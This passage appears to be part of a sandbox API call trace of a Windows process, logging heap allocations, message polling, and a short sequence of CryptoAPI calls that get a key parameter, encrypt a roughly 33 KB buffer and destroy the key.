returned 0x88c838 [0031.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0031.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0031.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0031.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0031.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0031.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0031.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0031.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0031.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0031.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0031.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0031.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0031.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0031.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0031.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0031.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0031.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0031.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0031.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0031.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0031.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0031.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0031.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0031.511] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0031.511] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0031.511] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.511] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0031.511] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0031.511] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0031.511] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0031.511] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0031.511] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0031.511] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0031.511] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0031.511] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0031.511] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0031.511] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0031.511] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.511] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0031.511] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0031.511] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.511] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0031.511] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0031.511] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0031.511] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0031.511] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0031.511] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0031.511] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0031.511] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0031.511] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0031.511] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.511] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0031.511] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0031.511] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0031.511] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.511] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0031.512] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0031.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.512] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0031.512] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0031.512] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.512] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0031.512] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0031.512] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da368, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da368*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0031.512] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.512] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.512] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.512] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.512] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.512] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0031.512] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.512] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.512] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0031.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0031.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0031.512] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.512] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0031.512] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0031.512] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0031.512] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.513] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0031.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0031.513] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.513] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0031.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0031.513] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.513] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.513] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.513] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0031.513] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.513] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0031.513] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.513] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.513] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x8427, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x8430) returned 1 [0031.513] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.513] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0031.514] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.514] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.514] CharLowerBuffW (in: lpsz="byte[33841]", cchLength=0xb | out: lpsz="byte[33841]") returned 0xb [0031.514] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.515] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.515] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.515] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.516] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.516] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.516] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8a0810*, pdwDataLen=0x6ae220*=0x8427, dwBufLen=0x8430 | out: pbData=0x8a0810*, pdwDataLen=0x6ae220*=0x8430) returned 1 [0031.516] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.516] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0031.516] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.518] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.518] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.518] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.518] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0031.518] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0031.518] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.518] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.518] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0031.518] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.518] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.518] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.518] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.518] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0031.518] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0031.518] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.518] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.518] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.518] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.518] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0031.518] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.519] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0031.519] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.519] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0031.519] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0031.519] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.523] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.523] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0031.523] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.524] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.524] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.524] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0031.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.525] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0031.525] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.525] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0031.525] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.525] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0031.525] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0031.525] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0031.525] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0031.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0031.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.525] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0031.525] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0031.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.525] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0031.525] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0031.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0031.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0031.525] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0031.525] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.526] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0031.526] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0031.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0031.526] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0031.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0031.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0031.526] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0031.526] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0031.526] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.526] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0031.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0031.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.526] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.526] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0031.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.526] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, 